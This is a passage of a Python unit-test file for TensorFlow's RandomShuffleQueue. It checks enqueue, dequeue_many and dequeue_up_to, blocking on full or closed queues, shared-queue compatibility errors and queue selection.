with self.assertRaisesOpError(
"require the components to have specified shapes"):
dequeued_t.eval()
enqueue_op.run()
# RandomShuffleQueue does not make any attempt to support DequeueMany
# with unspecified shapes, even if a shape could be inferred from the
# elements enqueued.
with self.assertRaisesOpError(
"require the components to have specified shapes"):
dequeued_t.eval()
def testEmptyDequeueUpToWithNoShape(self):
with self.test_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32)
enqueue_op = q.enqueue((constant_op.constant(
[10.0, 20.0], shape=(1, 2)),))
dequeued_t = q.dequeue_up_to(0)
# Expect the operation to fail due to the shape not being constrained.
with self.assertRaisesOpError(
"require the components to have specified shapes"):
dequeued_t.eval()
enqueue_op.run()
# RandomShuffleQueue does not make any attempt to support DequeueUpTo
# with unspecified shapes, even if a shape could be inferred from the
# elements enqueued.
with self.assertRaisesOpError(
"require the components to have specified shapes"):
dequeued_t.eval()
def testMultiEnqueueMany(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(
10, 0, (dtypes_lib.float32, dtypes_lib.int32))
float_elems = [10.0, 20.0, 30.0, 40.0]
int_elems = [[1, 2], [3, 4], [5, 6], [7, 8]]
enqueue_op = q.enqueue_many((float_elems, int_elems))
dequeued_t = q.dequeue()
enqueue_op.run()
enqueue_op.run()
results = []
for _ in range(8):
float_val, int_val = sess.run(dequeued_t)
results.append((float_val, [int_val[0], int_val[1]]))
expected = list(zip(float_elems, int_elems)) * 2
self.assertItemsEqual(expected, results)
def testDequeueMany(self):
with self.test_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_many(5)
enqueue_op.run()
results = dequeued_t.eval().tolist()
results.extend(dequeued_t.eval())
self.assertItemsEqual(elems, results)
def testDequeueUpToNoBlocking(self):
with self.test_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_up_to(5)
enqueue_op.run()
results = dequeued_t.eval().tolist()
results.extend(dequeued_t.eval())
self.assertItemsEqual(elems, results)
def testMultiDequeueMany(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(
10, 0, (dtypes_lib.float32, dtypes_lib.int32), shapes=((), (2,)))
float_elems = [
10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0
]
int_elems = [[1, 2], [3, 4], [5, 6], [7, 8], [9, 10], [11, 12], [13, 14],
[15, 16], [17, 18], [19, 20]]
enqueue_op = q.enqueue_many((float_elems, int_elems))
dequeued_t = q.dequeue_many(4)
dequeued_single_t = q.dequeue()
enqueue_op.run()
results = []
float_val, int_val = sess.run(dequeued_t)
self.assertEqual(float_val.shape, dequeued_t[0].get_shape())
self.assertEqual(int_val.shape, dequeued_t[1].get_shape())
results.extend(zip(float_val, int_val.tolist()))
float_val, int_val = sess.run(dequeued_t)
results.extend(zip(float_val, int_val.tolist()))
float_val, int_val = sess.run(dequeued_single_t)
self.assertEqual(float_val.shape, dequeued_single_t[0].get_shape())
self.assertEqual(int_val.shape, dequeued_single_t[1].get_shape())
results.append((float_val, int_val.tolist()))
float_val, int_val = sess.run(dequeued_single_t)
results.append((float_val, int_val.tolist()))
self.assertItemsEqual(zip(float_elems, int_elems), results)
def testMultiDequeueUpToNoBlocking(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(
10, 0, (dtypes_lib.float32, dtypes_lib.int32), shapes=((), (2,)))
float_elems = [
10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0
]
int_elems = [[1, 2], [3, 4], [5, 6], [7, 8], [9, 10], [11, 12], [13, 14],
[15, 16], [17, 18], [19, 20]]
enqueue_op = q.enqueue_many((float_elems, int_elems))
dequeued_t = q.dequeue_up_to(4)
dequeued_single_t = q.dequeue()
enqueue_op.run()
results = []
float_val, int_val = sess.run(dequeued_t)
# dequeue_up_to has undefined shape.
self.assertEqual([None], dequeued_t[0].get_shape().as_list())
self.assertEqual([None, 2], dequeued_t[1].get_shape().as_list())
results.extend(zip(float_val, int_val.tolist()))
float_val, int_val = sess.run(dequeued_t)
results.extend(zip(float_val, int_val.tolist()))
float_val, int_val = sess.run(dequeued_single_t)
self.assertEqual(float_val.shape, dequeued_single_t[0].get_shape())
self.assertEqual(int_val.shape, dequeued_single_t[1].get_shape())
results.append((float_val, int_val.tolist()))
float_val, int_val = sess.run(dequeued_single_t)
results.append((float_val, int_val.tolist()))
self.assertItemsEqual(zip(float_elems, int_elems), results)
def testHighDimension(self):
with self.test_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.int32, (
(4, 4, 4, 4)))
elems = np.array([[[[[x] * 4] * 4] * 4] * 4 for x in range(10)], np.int32)
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_many(10)
enqueue_op.run()
self.assertItemsEqual(dequeued_t.eval().tolist(), elems.tolist())
def testParallelEnqueueMany(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(
1000, 0, dtypes_lib.float32, shapes=())
elems = [10.0 * x for x in range(100)]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_many(1000)
# Enqueue 100 items in parallel on 10 threads.
def enqueue():
sess.run(enqueue_op)
threads = [self.checkedThread(target=enqueue) for _ in range(10)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
self.assertItemsEqual(dequeued_t.eval(), elems * 10)
def testParallelDequeueMany(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(
1000, 0, dtypes_lib.float32, shapes=())
elems = [10.0 * x for x in range(1000)]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_many(100)
enqueue_op.run()
# Dequeue 100 items in parallel on 10 threads.
dequeued_elems = []
def dequeue():
dequeued_elems.extend(sess.run(dequeued_t))
threads = [self.checkedThread(target=dequeue) for _ in range(10)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
self.assertItemsEqual(elems, dequeued_elems)
def testParallelDequeueUpTo(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(
1000, 0, dtypes_lib.float32, shapes=())
elems = [10.0 * x for x in range(1000)]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_up_to(100)
enqueue_op.run()
# Dequeue 100 items in parallel on 10 threads.
dequeued_elems = []
def dequeue():
dequeued_elems.extend(sess.run(dequeued_t))
threads = [self.checkedThread(target=dequeue) for _ in range(10)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
self.assertItemsEqual(elems, dequeued_elems)
def testParallelDequeueUpToRandomPartition(self):
with self.test_session() as sess:
dequeue_sizes = [random.randint(50, 150) for _ in xrange(10)]
total_elements = sum(dequeue_sizes)
q = data_flow_ops.RandomShuffleQueue(
total_elements, 0, dtypes_lib.float32, shapes=())
elems = [10.0 * x for x in xrange(total_elements)]
enqueue_op = q.enqueue_many((elems,))
dequeue_ops = [q.dequeue_up_to(size) for size in dequeue_sizes]
enqueue_op.run()
# Dequeue random number of items in parallel on 10 threads.
dequeued_elems = []
def dequeue(dequeue_op):
dequeued_elems.extend(sess.run(dequeue_op))
threads = []
for dequeue_op in dequeue_ops:
threads.append(self.checkedThread(target=dequeue, args=(dequeue_op,)))
for thread in threads:
thread.start()
for thread in threads:
thread.join()
self.assertItemsEqual(elems, dequeued_elems)
def testBlockingDequeueMany(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_many(4)
dequeued_elems = []
def enqueue():
# The enqueue_op should run after the dequeue op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
sess.run(enqueue_op)
def dequeue():
dequeued_elems.extend(sess.run(dequeued_t).tolist())
enqueue_thread = self.checkedThread(target=enqueue)
dequeue_thread = self.checkedThread(target=dequeue)
enqueue_thread.start()
dequeue_thread.start()
enqueue_thread.join()
dequeue_thread.join()
self.assertItemsEqual(elems, dequeued_elems)
def testBlockingDequeueUpTo(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_up_to(4)
dequeued_elems = []
def enqueue():
# The enqueue_op should run after the dequeue op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
sess.run(enqueue_op)
def dequeue():
dequeued_elems.extend(sess.run(dequeued_t).tolist())
enqueue_thread = self.checkedThread(target=enqueue)
dequeue_thread = self.checkedThread(target=dequeue)
enqueue_thread.start()
dequeue_thread.start()
enqueue_thread.join()
dequeue_thread.join()
self.assertItemsEqual(elems, dequeued_elems)
def testDequeueManyWithTensorParameter(self):
with self.test_session():
# Define a first queue that contains integer counts.
dequeue_counts = [random.randint(1, 10) for _ in range(100)]
count_q = data_flow_ops.RandomShuffleQueue(100, 0, dtypes_lib.int32)
enqueue_counts_op = count_q.enqueue_many((dequeue_counts,))
total_count = sum(dequeue_counts)
# Define a second queue that contains total_count elements.
elems = [random.randint(0, 100) for _ in range(total_count)]
q = data_flow_ops.RandomShuffleQueue(total_count, 0, dtypes_lib.int32, (
(),))
enqueue_elems_op = q.enqueue_many((elems,))
# Define a subgraph that first dequeues a count, then DequeuesMany
# that number of elements.
dequeued_t = q.dequeue_many(count_q.dequeue())
enqueue_counts_op.run()
enqueue_elems_op.run()
dequeued_elems = []
for _ in dequeue_counts:
dequeued_elems.extend(dequeued_t.eval())
self.assertItemsEqual(elems, dequeued_elems)
def testDequeueUpToWithTensorParameter(self):
with self.test_session():
# Define a first queue that contains integer counts.
dequeue_counts = [random.randint(1, 10) for _ in range(100)]
count_q = data_flow_ops.RandomShuffleQueue(100, 0, dtypes_lib.int32)
enqueue_counts_op = count_q.enqueue_many((dequeue_counts,))
total_count = sum(dequeue_counts)
# Define a second queue that contains total_count elements.
elems = [random.randint(0, 100) for _ in range(total_count)]
q = data_flow_ops.RandomShuffleQueue(total_count, 0, dtypes_lib.int32, (
(),))
enqueue_elems_op = q.enqueue_many((elems,))
# Define a subgraph that first dequeues a count, then DequeuesUpTo
# that number of elements.
dequeued_t = q.dequeue_up_to(count_q.dequeue())
enqueue_counts_op.run()
enqueue_elems_op.run()
dequeued_elems = []
for _ in dequeue_counts:
dequeued_elems.extend(dequeued_t.eval())
self.assertItemsEqual(elems, dequeued_elems)
def testDequeueFromClosedQueue(self):
with self.test_session():
q = data_flow_ops.RandomShuffleQueue(10, 2, dtypes_lib.float32)
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue()
enqueue_op.run()
close_op.run()
results = [dequeued_t.eval() for _ in elems]
expected = [[elem] for elem in elems]
self.assertItemsEqual(expected, results)
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.OutOfRangeError,
"is closed and has insufficient"):
dequeued_t.eval()
def testBlockingDequeueFromClosedQueue(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 2, dtypes_lib.float32)
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue()
enqueue_op.run()
results = []
def dequeue():
for _ in elems:
results.append(sess.run(dequeued_t))
self.assertItemsEqual(elems, results)
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.OutOfRangeError,
"is closed and has insufficient"):
sess.run(dequeued_t)
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
# The dequeue thread blocked when it hit the min_size requirement.
self.assertEqual(len(results), 2)
close_op.run()
dequeue_thread.join()
# Once the queue is closed, the min_size requirement is lifted.
self.assertEqual(len(results), 4)
def testBlockingDequeueFromClosedEmptyQueue(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32)
close_op = q.close()
dequeued_t = q.dequeue()
finished = [] # Needs to be a mutable type
def dequeue():
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.OutOfRangeError,
"is closed and has insufficient"):
sess.run(dequeued_t)
finished.append(True)
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
self.assertEqual(len(finished), 0)
close_op.run()
dequeue_thread.join()
self.assertEqual(len(finished), 1)
def testBlockingDequeueManyFromClosedQueue(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue_many(4)
enqueue_op.run()
progress = [] # Must be mutable
def dequeue():
self.assertItemsEqual(elems, sess.run(dequeued_t))
progress.append(1)
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.OutOfRangeError,
"is closed and has insufficient"):
sess.run(dequeued_t)
progress.append(2)
self.assertEqual(len(progress), 0)
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
for _ in range(100):
time.sleep(0.01)
if len(progress) == 1:
break
self.assertEqual(len(progress), 1)
time.sleep(0.01)
close_op.run()
dequeue_thread.join()
self.assertEqual(len(progress), 2)
def testBlockingDequeueUpToFromClosedQueueReturnsRemainder(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue_up_to(3)
enqueue_op.run()
results = []
def dequeue():
results.extend(sess.run(dequeued_t))
self.assertEquals(3, len(results))
results.extend(sess.run(dequeued_t))
self.assertEquals(4, len(results))
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_op.run()
dequeue_thread.join()
self.assertItemsEqual(results, elems)
def testBlockingDequeueUpToSmallerThanMinAfterDequeue(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(
capacity=10,
min_after_dequeue=2,
dtypes=dtypes_lib.float32,
shapes=((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue_up_to(3)
enqueue_op.run()
results = []
def dequeue():
results.extend(sess.run(dequeued_t))
self.assertEquals(3, len(results))
# min_after_dequeue is 2, we ask for 3 elements, and we end up only
# getting the remaining 1.
results.extend(sess.run(dequeued_t))
self.assertEquals(4, len(results))
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_op.run()
dequeue_thread.join()
self.assertItemsEqual(results, elems)
def testBlockingDequeueManyFromClosedQueueWithElementsRemaining(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue_many(3)
cleanup_dequeue_t = q.dequeue_many(q.size())
enqueue_op.run()
results = []
def dequeue():
results.extend(sess.run(dequeued_t))
self.assertEqual(len(results), 3)
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.OutOfRangeError,
"is closed and has insufficient"):
sess.run(dequeued_t)
# While the last dequeue failed, we want to insure that it returns
# any elements that it potentially reserved to dequeue. Thus the
# next cleanup should return a single element.
results.extend(sess.run(cleanup_dequeue_t))
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_op.run()
dequeue_thread.join()
self.assertEqual(len(results), 4)
def testBlockingDequeueManyFromClosedEmptyQueue(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 5, dtypes_lib.float32, ((),))
close_op = q.close()
dequeued_t = q.dequeue_many(4)
def dequeue():
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.OutOfRangeError,
"is closed and has insufficient"):
sess.run(dequeued_t)
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_op.run()
dequeue_thread.join()
def testBlockingDequeueUpToFromClosedEmptyQueue(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 5, dtypes_lib.float32, ((),))
close_op = q.close()
dequeued_t = q.dequeue_up_to(4)
def dequeue():
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.OutOfRangeError,
"is closed and has insufficient"):
sess.run(dequeued_t)
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_op.run()
dequeue_thread.join()
def testEnqueueToClosedQueue(self):
with self.test_session():
q = data_flow_ops.RandomShuffleQueue(10, 4, dtypes_lib.float32)
enqueue_op = q.enqueue((10.0,))
close_op = q.close()
enqueue_op.run()
close_op.run()
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.CancelledError, "is closed"):
enqueue_op.run()
def testEnqueueManyToClosedQueue(self):
with self.test_session():
q = data_flow_ops.RandomShuffleQueue(10, 5, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
enqueue_op.run()
close_op.run()
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.CancelledError, "is closed"):
enqueue_op.run()
def testBlockingEnqueueToFullQueue(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(4, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
blocking_enqueue_op = q.enqueue((50.0,))
dequeued_t = q.dequeue()
enqueue_op.run()
def blocking_enqueue():
sess.run(blocking_enqueue_op)
thread = self.checkedThread(target=blocking_enqueue)
thread.start()
# The dequeue ops should run after the blocking_enqueue_op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
results = []
for _ in elems:
results.append(dequeued_t.eval())
results.append(dequeued_t.eval())
self.assertItemsEqual(elems + [50.0], results)
# There wasn't room for 50.0 in the queue when the first element was
# dequeued.
self.assertNotEqual(50.0, results[0])
thread.join()
def testBlockingEnqueueManyToFullQueue(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(4, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
blocking_enqueue_op = q.enqueue_many(([50.0, 60.0],))
dequeued_t = q.dequeue()
enqueue_op.run()
def blocking_enqueue():
sess.run(blocking_enqueue_op)
thread = self.checkedThread(target=blocking_enqueue)
thread.start()
# The dequeue ops should run after the blocking_enqueue_op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
results = []
for _ in elems:
time.sleep(0.01)
results.append(dequeued_t.eval())
results.append(dequeued_t.eval())
results.append(dequeued_t.eval())
self.assertItemsEqual(elems + [50.0, 60.0], results)
# There wasn't room for 50.0 or 60.0 in the queue when the first
# element was dequeued.
self.assertNotEqual(50.0, results[0])
self.assertNotEqual(60.0, results[0])
# Similarly for 60.0 and the second element.
self.assertNotEqual(60.0, results[1])
thread.join()
def testBlockingEnqueueToClosedQueue(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(4, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
blocking_enqueue_op = q.enqueue((50.0,))
dequeued_t = q.dequeue()
close_op = q.close()
enqueue_op.run()
def blocking_enqueue():
# Expect the operation to succeed since it will complete
# before the queue is closed.
sess.run(blocking_enqueue_op)
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.CancelledError, "closed"):
sess.run(blocking_enqueue_op)
thread1 = self.checkedThread(target=blocking_enqueue)
thread1.start()
# The close_op should run after the first blocking_enqueue_op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
def blocking_close():
sess.run(close_op)
thread2 = self.checkedThread(target=blocking_close)
thread2.start()
# Wait for the close op to block before unblocking the enqueue.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
results = []
# Dequeue to unblock the first blocking_enqueue_op, after which the
# close will complete.
results.append(dequeued_t.eval())
self.assertTrue(results[0] in elems)
thread2.join()
thread1.join()
def testBlockingEnqueueManyToClosedQueue(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(4, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0]
enqueue_op = q.enqueue_many((elems,))
blocking_enqueue_op = q.enqueue_many(([50.0, 60.0],))
close_op = q.close()
size_t = q.size()
enqueue_op.run()
self.assertEqual(size_t.eval(), 3)
def blocking_enqueue():
# This will block until the dequeue after the close.
sess.run(blocking_enqueue_op)
thread1 = self.checkedThread(target=blocking_enqueue)
thread1.start()
# First blocking_enqueue_op of blocking_enqueue has enqueued 1 of 2
# elements, and is blocked waiting for one more element to be dequeue.
for i in range(50):
queue_size = size_t.eval()
if queue_size == 4:
break
elif i == 49:
self.fail(
"Blocking enqueue op did not execute within the expected time.")
time.sleep(0.1)
def blocking_close():
sess.run(close_op)
thread2 = self.checkedThread(target=blocking_close)
thread2.start()
# Unblock the first blocking_enqueue_op in blocking_enqueue.
q.dequeue().eval()
thread2.join()
thread1.join()
# At this point the close operation will complete, so the next enqueue
# will fail.
with self.assertRaisesRegexp(errors_impl.CancelledError, "closed"):
sess.run(blocking_enqueue_op)
def testSharedQueueSameSession(self):
with self.test_session():
q1 = data_flow_ops.RandomShuffleQueue(
1, 0, dtypes_lib.float32, ((),), shared_name="shared_queue")
q1.enqueue((10.0,)).run()
# TensorFlow TestCase adds a default graph seed (=87654321). We check if
# the seed computed from the default graph seed is reproduced.
seed = 887634792
q2 = data_flow_ops.RandomShuffleQueue(
1,
0,
dtypes_lib.float32, ((),),
shared_name="shared_queue",
seed=seed)
q1_size_t = q1.size()
q2_size_t = q2.size()
self.assertEqual(q1_size_t.eval(), 1)
self.assertEqual(q2_size_t.eval(), 1)
self.assertEqual(q2.dequeue().eval(), 10.0)
self.assertEqual(q1_size_t.eval(), 0)
self.assertEqual(q2_size_t.eval(), 0)
q2.enqueue((20.0,)).run()
self.assertEqual(q1_size_t.eval(), 1)
self.assertEqual(q2_size_t.eval(), 1)
self.assertEqual(q1.dequeue().eval(), 20.0)
self.assertEqual(q1_size_t.eval(), 0)
self.assertEqual(q2_size_t.eval(), 0)
def testSharedQueueSameSessionGraphSeedNone(self):
with self.test_session():
q1 = data_flow_ops.RandomShuffleQueue(
1,
0,
dtypes_lib.float32, ((),),
shared_name="shared_queue",
seed=98765432)
q1.enqueue((10.0,)).run()
# If both graph and op seeds are not provided, the default value must be
# used, and in case a shared queue is already created, the second queue op
# must accept any previous seed value.
random_seed.set_random_seed(None)
q2 = data_flow_ops.RandomShuffleQueue(
1, 0, dtypes_lib.float32, ((),), shared_name="shared_queue")
q1_size_t = q1.size()
q2_size_t = q2.size()
self.assertEqual(q1_size_t.eval(), 1)
self.assertEqual(q2_size_t.eval(), 1)
def testIncompatibleSharedQueueErrors(self):
with self.test_session():
q_a_1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shared_name="q_a")
q_a_2 = data_flow_ops.RandomShuffleQueue(
15, 5, dtypes_lib.float32, shared_name="q_a")
q_a_1.queue_ref.op.run()
with self.assertRaisesOpError("capacity"):
q_a_2.queue_ref.op.run()
q_b_1 = data_flow_ops.RandomShuffleQueue(
10, 0, dtypes_lib.float32, shared_name="q_b")
q_b_2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shared_name="q_b")
q_b_1.queue_ref.op.run()
with self.assertRaisesOpError("min_after_dequeue"):
q_b_2.queue_ref.op.run()
q_c_1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shared_name="q_c")
q_c_2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.int32, shared_name="q_c")
q_c_1.queue_ref.op.run()
with self.assertRaisesOpError("component types"):
q_c_2.queue_ref.op.run()
q_d_1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shared_name="q_d")
q_d_2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shapes=[(1, 1, 2, 3)], shared_name="q_d")
q_d_1.queue_ref.op.run()
with self.assertRaisesOpError("component shapes"):
q_d_2.queue_ref.op.run()
q_e_1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shapes=[(1, 1, 2, 3)], shared_name="q_e")
q_e_2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shared_name="q_e")
q_e_1.queue_ref.op.run()
with self.assertRaisesOpError("component shapes"):
q_e_2.queue_ref.op.run()
q_f_1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shapes=[(1, 1, 2, 3)], shared_name="q_f")
q_f_2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shapes=[(1, 1, 2, 4)], shared_name="q_f")
q_f_1.queue_ref.op.run()
with self.assertRaisesOpError("component shapes"):
q_f_2.queue_ref.op.run()
q_g_1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shared_name="q_g")
q_g_2 = data_flow_ops.RandomShuffleQueue(
10, 5, (dtypes_lib.float32, dtypes_lib.int32), shared_name="q_g")
q_g_1.queue_ref.op.run()
with self.assertRaisesOpError("component types"):
q_g_2.queue_ref.op.run()
q_h_1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, seed=12, shared_name="q_h")
q_h_2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, seed=21, shared_name="q_h")
q_h_1.queue_ref.op.run()
with self.assertRaisesOpError("random seeds"):
q_h_2.queue_ref.op.run()
def testSelectQueue(self):
with self.test_session():
num_queues = 10
qlist = list()
for _ in xrange(num_queues):
qlist.append(
data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32))
# Enqueue/Dequeue into a dynamically selected queue
for _ in xrange(20):
index = np.random.randint(num_queues)
q = data_flow_ops.RandomShuffleQueue.from_list(index, qlist)
q.enqueue((10.,)).run()
self.assertEqual(q.dequeue().eval(), 10.0)
def testSelectQueueOutOfRange(self):
with self.test_session():
q1 = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32)
q2 = data_flow_ops.RandomShuffleQueue(15, 0, dtypes_lib.float32)
enq_q = data_flow_ops.RandomShuffleQueue.from_list(3, [q1, q2])
with self.assertRaisesOpError("is not in"):
enq_q.dequeue().eval()
def _blockingDequeue(self, sess, dequeue_op):
with self.assertRaisesOpError("was cancelled"):
sess.run(dequeue_op)
def _blockingDequeueMany(self, sess, dequeue_many_op):
with self.assertRaisesOpError("was cancelled"):
sess.run(dequeue_many_op)
def _blockingDequeueUpTo(self, sess, dequeue_up_to_op):
with self.assertRaisesOpError("was cancelled"):
sess.run(dequeue_up_to_op)
def _blockingEnqueue(self, sess, enqueue_op):
with self.assertRaisesOpError("was cancelled"):
sess.run(enqueue_op)
def _blockingEnqueueMany(self, sess, enqueue_many_op):
with self.assertRaisesOpError("was cancelled"):
sess.run(enqueue_many_op)
def testResetOfBlockingOperation(self):
with self.test_session() as sess:
q_empty = data_flow_ops.RandomShuffleQueue(5, 0, dtypes_lib.float32, (
(),))
dequeue_op = q_empty.dequeue()
dequeue_many_op = q_empty.dequeue_many(1)
dequeue_up_to_op = q_empty.dequeue_up_to(1)
q_full = data_flow_ops.RandomShuffleQueue(5, 0, dtypes_lib.float32, ((),))
sess.run(q_full.enqueue_many(([1.0, 2.0, 3.0, 4.0, 5.0],)))
enqueue_op = q_full.enqueue((6.0,))
enqueue_many_op = q_full.enqueue_many(([6.0],))
threads = [
self.checkedThread(
self._blockingDequeue, args=(sess, dequeue_op)),
self.checkedThread(
self._blockingDequeueMany, args=(sess, dequeue_many_op)),
self.checkedThread(
self._blockingDequeueUpTo, args=(sess, dequeue_up_to_op)),
self.checkedThread(
self._blockingEnqueue, args=(sess, enqueue_op)),
self.checkedThread(
self._blockingEnqueueMany, args=(sess, enqueue_many_op))
]
for t in threads:
t.start()
time.sleep(0.1)
sess.close() # Will cancel the blocked operations.
for t in threads:
t.join()
def testDequeueManyInDifferentOrders(self):
with self.test_session():
# Specify seeds to make the test deterministic
# (https://en.wikipedia.org/wiki/Taxicab_number).
